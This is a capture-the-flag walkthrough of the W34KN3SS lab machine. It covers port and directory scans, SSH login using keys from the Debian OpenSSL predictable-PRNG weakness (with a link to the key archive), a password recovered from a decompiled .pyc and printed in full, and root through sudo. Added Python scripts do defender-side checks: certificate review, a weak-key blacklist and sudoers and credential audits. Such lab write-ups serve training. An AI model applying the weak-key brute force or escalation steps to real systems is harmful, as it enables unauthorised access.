you can download it here: https://www.vulnhub.com/entry/w34kn3ss-1,270/

Use nmap to do a thorough scan of all 65535 TCP ports, with service and OS detection:

root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.159
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 12:53 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating ARP Ping Scan at 12:53
Scanning 192.168.227.159 [1 port]
Completed ARP Ping Scan at 12:53, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:53
Completed Parallel DNS resolution of 1 host. at 12:53, 0.15s elapsed
Initiating SYN Stealth Scan at 12:53
Scanning 192.168.227.159 [65535 ports]
Discovered open port 443/tcp on 192.168.227.159
Discovered open port 80/tcp on 192.168.227.159
Discovered open port 22/tcp on 192.168.227.159
Completed SYN Stealth Scan at 12:53, 2.45s elapsed (65535 total ports)
Initiating Service scan at 12:53
Scanning 3 services on 192.168.227.159
Completed Service scan at 12:53, 12.40s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.159
NSE: Script scanning 192.168.227.159.
Initiating NSE at 12:53
Completed NSE at 12:54, 14.51s elapsed
Initiating NSE at 12:54
Completed NSE at 12:54, 0.03s elapsed
Nmap scan report for 192.168.227.159
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)
| 256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)
|_ 256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Issuer: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-05-05T11:12:54
| Not valid after: 2019-05-05T11:12:54
| MD5: f921 c4be 2c6e 89d6 adaf a7c2 8f39 a87d
|_SHA-1: 0b44 5a28 c4da 0bf8 b308 a782 4081 1218 101e 0feb
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
MAC Address: 00:0C:29:26:2F:49 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 9.796 days (since Wed May 29 17:47:24 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.227.159

NSE: Script Post-scanning.
Initiating NSE at 12:54
Completed NSE at 12:54, 0.00s elapsed
Initiating NSE at 12:54
Completed NSE at 12:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.12 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
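As an added defender-side example (not part of the original write-up), the following Python script parses nmap's normal output, pulls out the open ports and the TLS certificate facts, and reviews them the way a practitioner would read the report above: the certificate's "Not valid after" date (2019-05-05) was already past at scan time (2019-06-08), and the self-signed certificate discloses the internal hostname weakness.jth. The report excerpt and the scan timestamp are constructed from the output above and embedded inline so the script runs offline.

```python
import re
from datetime import datetime

# Constructed excerpt modelled on the nmap report above (sample input, not a live scan).
SAMPLE_REPORT = """\
Nmap scan report for 192.168.227.159
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Issuer: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Not valid before: 2018-05-05T11:12:54
| Not valid after: 2019-05-05T11:12:54
"""

# Time of the scan, taken from the report header above (constructed for the demo).
SCAN_TIME = datetime(2019, 6, 8, 12, 53)

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SUBJECT_CN_RE = re.compile(r"ssl-cert: Subject: commonName=([^/\s]+)")
ISSUER_CN_RE = re.compile(r"Issuer: commonName=([^/\s]+)")
NOT_AFTER_RE = re.compile(r"Not valid after:\s+(\S+)")


def parse_report(text):
    """Pull open ports and TLS certificate facts out of nmap's normal output."""
    ports, cert = [], {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
            continue
        for key, rx in (("subject_cn", SUBJECT_CN_RE), ("issuer_cn", ISSUER_CN_RE)):
            m = rx.search(line)
            if m:
                cert[key] = m.group(1)
        m = NOT_AFTER_RE.search(line)
        if m:
            cert["not_after"] = datetime.fromisoformat(m.group(1))
    return ports, cert


def review(ports, cert, scan_time):
    """Return the findings a defender would want to see from this report."""
    notes = [f"open {p['port']}/{p['proto']} {p['service']} {p['version']}".rstrip()
             for p in ports if p["state"] == "open"]
    if "not_after" in cert and cert["not_after"] < scan_time:
        notes.append(f"certificate for {cert.get('subject_cn', '?')} "
                     f"expired on {cert['not_after'].date()}")
    # Subject CN equal to issuer CN means a self-signed certificate; the CN itself
    # discloses an internal hostname that is not otherwise visible from the IP.
    if cert.get("subject_cn") and cert.get("subject_cn") == cert.get("issuer_cn"):
        notes.append(f"self-signed certificate discloses internal hostname {cert['subject_cn']}")
    return notes


if __name__ == "__main__":
    ports, cert = parse_report(SAMPLE_REPORT)
    for note in review(ports, cert, SCAN_TIME):
        print(note)
```

The same parser works on a saved `nmap -oN` file; feed it the file contents instead of `SAMPLE_REPORT` and pass the real scan time.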

Checking the HTTP server on port 80 shows only the default Apache page, so use dirb to scan for sensitive directories and files:

root@kali:~# dirb http://192.168.227.159/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jun 8 12:48:46 2019
URL_BASE: http://192.168.227.159/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.159/ ----
==> DIRECTORY: http://192.168.227.159/blog/
+ http://192.168.227.159/index.html (CODE:200|SIZE:10918)
+ http://192.168.227.159/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.227.159/test/
==> DIRECTORY: http://192.168.227.159/uploads/

---- Entering directory: http://192.168.227.159/blog/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.159/test/ ----
+ http://192.168.227.159/test/index.html (CODE:200|SIZE:72)

---- Entering directory: http://192.168.227.159/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Jun 8 12:48:52 2019
DOWNLOADED: 9224 - FOUND: 3

I checked the /uploads and /blog directories, both empty, then checked the /test directory and found http://192.168.227.159/test/keys2.jpg.


I downloaded the jpg and analyzed it using binwalk and exiftool, nothing special; tried steghide to extract information and tried some keys, but failed.

I decided to check the nmap scan report and found this interesting hostname in the HTTPS SSL certificate:

weakness.jth


Add this hostname to /etc/hosts, pointing to the same IP.


Check the /private directory.


mykey.pub seems to be a public key; notes.txt contains something interesting.


It means this OpenSSL version is vulnerable. Searching Google for “openssl 0.9.8c-1” found this: https://www.exploit-db.com/exploits/5720

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

Take a look at the vulnerability description: the following line was removed from md_rand.c.

MD_Update(&m,buf,j);
[ .. ]
MD_Update(&m,buf,j); /* purify complains */

Removing this line makes the random seed predictable: the only remaining input to the seed is the current process ID, which is at most 32768, so there are only 32768 possible seed values for the PRNG. That means every possible private/public key pair can be generated in advance and used to brute-force the SSH server. The key pairs are available here: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

After downloading and extracting the key pairs, I need to find which of the generated public keys contains the key in mykey.pub:

find . | xargs grep -ri "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw==" -l


So I can use 4161de56829de2fe64b9055711f531c1-2537 as the private key to log in to the sshd server.
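The grep above answers the attacker's question (which generated key matches mykey.pub); the defender's version of the same check is what the openssh-blacklist tooling did: fingerprint every key in authorized_keys and compare against the fingerprints of the known-weak set. As an added example (not part of the original write-up), the Python below encodes OpenSSH public key lines, computes the SHA256 fingerprint the same way `ssh-keygen -lf` prints it, builds a blacklist from a set of "weak" keys and audits an authorized_keys file against it. The weak keys and the authorized_keys entries are constructed toy keys with tiny placeholder moduli, not real keys and not the key pairs from the archive.

```python
import base64
import hashlib
import struct


def _ssh_string(data):
    # OpenSSH wire format: 4-byte big-endian length prefix followed by the bytes.
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n):
    # Positive mpint: big-endian, with a leading zero byte when the top bit is set.
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_rsa_pub_line(e, n, comment):
    """Encode (e, n) as an OpenSSH 'ssh-rsa' public key line. Used here only to build
    constructed toy keys; the moduli passed in below are placeholders, not real keys."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def fingerprint(pub_line):
    """SHA256 fingerprint of the key blob, in the form ssh-keygen -lf prints it."""
    parts = pub_line.split()
    if len(parts) < 2 or not parts[0].startswith(("ssh-", "ecdsa-")):
        raise ValueError("not an OpenSSH public key line")
    digest = hashlib.sha256(base64.b64decode(parts[1])).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def build_blacklist(weak_pub_lines):
    """Fingerprint every known-weak public key once; only the set of fingerprints
    needs to be distributed to the hosts being audited."""
    return {fingerprint(line) for line in weak_pub_lines}


def audit_authorized_keys(authorized_keys_text, blacklist):
    """Return (line number, comment, fingerprint) for each entry found on the blacklist."""
    hits = []
    for lineno, line in enumerate(authorized_keys_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # authorized_keys lines may carry options (from=, command=, ...) before the
        # key type; skip ahead to the key itself.
        idx = line.find("ssh-")
        if idx < 0:
            continue
        key_part = line[idx:]
        fp = fingerprint(key_part)
        if fp in blacklist:
            fields = key_part.split(maxsplit=2)
            comment = fields[2] if len(fields) > 2 else ""
            hits.append((lineno, comment, fp))
    return hits


# Constructed stand-in for the generated weak key set (toy moduli, clearly not real keys).
WEAK_KEYS = [make_rsa_pub_line(65537, 0xC0FFEE + i, f"weak-{i}") for i in range(4)]

# Constructed authorized_keys: the entry on line 3 reuses one of the "weak" keys,
# behind a from= option; the other two entries are unrelated toy keys.
AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    make_rsa_pub_line(65537, 0xDEADBEEF, "ops@host"),
    'from="10.0.0.0/8" ' + make_rsa_pub_line(65537, 0xC0FFEE + 2, "legacy@host"),
    make_rsa_pub_line(65537, 0xFEEDFACE, "deploy@ci"),
])

if __name__ == "__main__":
    blacklist = build_blacklist(WEAK_KEYS)
    for lineno, comment, fp in audit_authorized_keys(AUTHORIZED_KEYS, blacklist):
        print(f"line {lineno}: blacklisted key {fp} ({comment})")
```

The comparison is on the key blob only, so a weak key is caught whatever comment or options the authorized_keys entry carries; the same routine can be pointed at host keys in /etc/ssh, which were affected by the same generator.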

Logging in as root failed. Taking a look at the front page of http://weakness.jth/, I found something interesting.


There is an “n30” near the rabbit; I guess that is the username.


According to the hint in his home directory, I need to sudo to get a root shell, but I don’t know n30’s password. There is an interesting file:


It is a compiled Python file; I can easily decompile it here: https://python-decompiler.com/


this seems to be n30’s password:

dMASDNB!!#B!#!#33
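The lesson for a defender is that compiling Python does not hide string literals: they sit in the code object's constants and come straight back out of the .pyc body, decompiler or not. As an added example (not part of the original write-up), the Python below compiles a constructed sample script, marshals it exactly as a .pyc stores it, and then walks the bytecode to find `NAME = "literal"` assignments whose variable name looks like a credential. The sample source and its placeholder strings are constructed for the demo and are not the file or password from the machine.

```python
import dis
import marshal
import types

# Constructed sample source standing in for the compiled file found on the box;
# the string values are placeholders, not the machine's real credential.
SAMPLE_SOURCE = '''
import sys

PASSWORD = "constructed-demo-secret"
API_TOKEN = "constructed-demo-token"
BANNER = "welcome"

def check(candidate):
    return candidate == PASSWORD
'''

# Substrings that make a variable name look credential-like (assumption for the demo).
SENSITIVE_HINTS = ("pass", "pwd", "secret", "key", "token")


def compile_to_pyc_body(source):
    """Compile source and marshal the code object: this is what follows the header
    in a .pyc file, so it is exactly what someone holding the file can read."""
    return marshal.dumps(compile(source, "<sample>", "exec"))


def _walk(code):
    """Yield the module code object and every nested function or class body."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from _walk(const)


def string_assignments(pyc_body):
    """Find NAME = "literal" patterns by pairing a LOAD_CONST of a str with the
    STORE_* instruction that immediately follows it."""
    found = []
    for co in _walk(marshal.loads(pyc_body)):
        prev = None
        for ins in dis.get_instructions(co):
            if (ins.opname in ("STORE_NAME", "STORE_GLOBAL", "STORE_FAST")
                    and prev is not None and prev.opname == "LOAD_CONST"
                    and isinstance(prev.argval, str)):
                found.append((ins.argval, prev.argval))
            prev = ins
    return found


def flag_hardcoded_credentials(pyc_body):
    """Keep only the assignments whose variable name suggests a credential."""
    return [(name, value) for name, value in string_assignments(pyc_body)
            if any(hint in name.lower() for hint in SENSITIVE_HINTS)]


if __name__ == "__main__":
    body = compile_to_pyc_body(SAMPLE_SOURCE)
    for name, value in flag_hardcoded_credentials(body):
        print(f"hard-coded credential: {name} = {value!r}")
```

To run this over a real .pyc, skip the file header (16 bytes on Python 3.7 and later) and pass the remainder to `flag_hardcoded_credentials`; the bytecode must have been produced by the same interpreter version, since marshal and opcode layouts change between releases.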

Check what n30 is allowed to run with sudo:

sudo -l


OK, n30 can sudo and execute anything, so a root shell is one command away:

sudo /bin/bash
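A rule like the one n30 has (`ALL=(ALL:ALL) ALL`) is the kind of thing a sudoers audit should flag before anyone runs `sudo -l` on a compromised box. As an added example (not part of the original write-up), the Python below parses a constructed sudoers excerpt whose first non-root rule mirrors n30's, separates the run-as specification and tags such as NOPASSWD from the command list, and reports the rules that grant a full root shell or password-less sudo. The sudoers text is constructed sample input, and the severity labels are this example's own.

```python
import re

# Constructed sudoers excerpt; the n30 rule mirrors the situation in the write-up.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
n30     ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
backup  ALL=(root) /usr/bin/rsync
%admin  ALL=(ALL) ALL
"""

# user_or_group  hosts = (runas_user[:runas_group]) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>[%+]?\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"\s*([A-Z]+):\s*")


def parse_sudoers(text):
    """Turn user specification lines into dicts; Defaults and comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        tags = []
        while True:  # peel off leading tags such as NOPASSWD: or SETENV:
            t = TAG_RE.match(cmds)
            if not t:
                break
            tags.append(t.group(1))
            cmds = cmds[t.end():]
        runas = m.group("runas") or "root"  # sudoers default when no (runas) is given
        rules.append({"who": m.group("who"), "hosts": m.group("hosts"),
                      "runas_user": runas.split(":")[0].strip(), "tags": tags,
                      "commands": [c.strip() for c in cmds.split(",")]})
    return rules


def audit_sudoers(text):
    """Return (who, severity, reason) for every rule that grants broad privilege."""
    findings = []
    for r in parse_sudoers(text):
        if r["who"] == "root":
            continue  # root already has everything; the rule is boilerplate
        as_root = r["runas_user"] in ("ALL", "root")
        if "ALL" in r["commands"] and as_root:
            findings.append((r["who"], "high", "may run any command as root (full root shell)"))
        elif "NOPASSWD" in r["tags"]:
            findings.append((r["who"], "medium",
                             "password-less sudo for: " + ", ".join(r["commands"])))
    return findings


if __name__ == "__main__":
    for who, severity, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {who}: {reason}")
```

The parser covers the common one-line user specification; aliases (`User_Alias`, `Cmnd_Alias`) and `#include` directives are not expanded here, so on a real system run it over the output of `visudo -c` or each file under /etc/sudoers.d as well.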
